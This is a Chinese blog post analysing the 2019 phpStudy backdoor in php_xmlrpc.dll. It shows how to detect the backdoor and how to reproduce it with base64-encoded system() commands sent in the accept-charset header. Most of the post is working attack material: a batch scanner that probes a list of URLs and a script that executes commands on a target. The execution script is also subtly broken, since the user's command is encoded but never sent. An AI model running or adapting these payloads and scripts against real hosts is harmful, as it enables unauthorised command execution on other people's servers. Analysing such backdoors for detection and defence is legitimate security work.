

H0e4a0r1t的小屋

phpstudy后门分析

H0e4a0r1t的小屋

phpstudy后门分析

字数统计: 797阅读时长: 4 min

 2019/09/30   Share

• 
• 
• 
• 
• 

最近phpstudy后门一经爆出，震惊了安全圈，不知不觉的当了三年肉鸡-。-、

都爆出好久了，我也跟风一波，分析一下，搞篇文章了，观摩众多大佬，划水一波算了：）

0x01. 影响版本

• phpStudy2016
  php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
• phpStudy2018
  PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

0x02. 漏洞发现

用记事本或者Notepad++打开phpstudy安装目录下的：

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

存在@eval(%s('%s'));即说明有后门。

0x03. 复现

复现环境：win7+phpStudy 2018(php-5.4.45+Apache)

访问首页，抓包

在请求头里构造 Accept-Encoding 和 accept-charset 即可。

accept-charset: c3lzdGVtKCduZXQgdXNlcicpOw== system(‘net user’);

accept-charset: c3lzdGVtKCdpcGNvbmZpZycpIDs= system(‘ipconfig’);

accept-charset: c3lzdGVtKCd3aG9hbWknKSA7 system(‘whoami’);

Accept-Encoding 已经有了，但是这里注意：
要把gzip, deflate 里逗号后面的空格去掉，不然命令执行不成功。

base64 转义建议小葵工具包

后门检测脚本

# !/usr/bin/env python
# -*- coding:utf-8 -*-

import gevent
from gevent import monkey

gevent.monkey.patch_all()
import requests as rq


def file_read(file_name="url.txt"):
    with open(file_name, "r") as f:
        return [i.replace("\n", "") for i in f.readlines()]


def check(url):
    '''
    if "http://" or "https://" not in url:
        url = "https://" + url
    '''
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Sec-Fetch-Site': 'none',
        'accept-charset': 'ZWNobyBlZVN6eHU5Mm5JREFiOw==',  # 输出 eeSzxu92nIDAb
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    try:
        res = rq.get(url, headers=headers, timeout=20)
        if res.status_code == 200:
            if res.text.find('eeSzxu92nIDAb'):
                print("[存在漏洞] " + url)
    except:
        print("[超时] " + url)


if __name__ == '__main__':
    print("phpStudy 批量检测 (需要 gevent,requests 库)")
    print("使用之前，请将URL保存为 url.txt 放置此程序同目录下")
    input("任意按键开始执行..")
    tasks = [gevent.spawn(check, url) for url in file_read()]
    print("正在执行...请等候")
    gevent.joinall(tasks)
    wait = input("执行完毕 任意键退出...")

后门执行脚本

# !/usr/bin/env python
# -*- coding:utf-8 -*-

import requests
import base64


def backdoor(url, command="system('calc.exe');"):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Sec-Fetch-Site': 'none',
        'accept-charset': 'c3lzdGVtKCdjYWxjLmV4ZScpOw==',
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    command = base64.b64encode(command.encode('utf-8'))
    command = str(command, 'utf-8')
    result = requests.get(url, headers=headers, verify=False)
    if result.status_code == "200":
        print("执行完成")
    a = input("任意键退出...")


url = input("输入URL(例如:http://127.0.0.1:228/xx.php)\n")
command = input("输入命令 默认为 system('calc.exe'); (不想输入直接回车)\n")
backdoor(url, command)

参考：

https://www.cnblogs.com/liliyuanshangcao/p/11584397.html

原文作者：H0e4a0r1t

原文链接：https://h0e4a0r1t.github.io/2019/09/30/phpstudy后门/

发表日期：September 30th 2019, 10:16:28 pm

更新日期：September 30th 2019, 11:59:17 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Windows日志的删除与绕过
• Previous Post
  新的开始

Powered by H0e4a0r1ttheme H0e4a0r1t

PV: :)

CATALOG

1. 1. 0x01. 影响版本
2. 2. 0x02. 漏洞发现
3. 3. 0x03. 复现

后门检测脚本

后门执行脚本

1. 1. 参考：



• Archive
• Tag
• Cate

Total : 30

2020

• 10/14个人公众号文章[实时更新]
• 07/02红方作战手册[转载]
• 07/022020攻防演练弹药库[转载]

2019

• 10/29windows中常见后门持久化方法总结
• 10/15Windows系统远程桌面的多用户登录
• 10/14Token窃取与利用
• 10/01Windows日志的删除与绕过
• 09/30phpstudy后门分析
• 05/072019/5/9随记
• 05/04CSRF

Invalid date

• Invalid dateCVE-2019-14287 sudo 配置不当-权限提升漏洞

2019

• 04/242019/4/23 随记
• 04/232019/4/28 随记
• 04/22Recon 新思路
• 04/22SSRF

Invalid date

• Invalid date新的开始

2019

• 04/22Recon

Invalid date

• Invalid date你看我小不小学生就完了😂

2019

• 03/17Hello

Invalid date

• Invalid date逻辑漏洞案例总结

Invalid date

• Invalid date九种姿势运行Mimikatz

Invalid date

• Invalid date反序列化

Invalid date

• Invalid dateWindows系统的帐户隐藏

Invalid date

• Invalid dateURL跳转

Invalid date

• Invalid dateWFUZZ

Invalid date

• Invalid dateXSS_Notes_1

Invalid date

• Invalid date域渗透常用命令

Invalid date

• Invalid date博客停止更新，转战微信公众号

Invalid date

• Invalid date泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库)

Invalid date

• Invalid datecobaltstrike初体验



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

